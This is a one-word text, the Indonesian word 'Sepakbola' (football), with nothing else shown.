


Sepakbola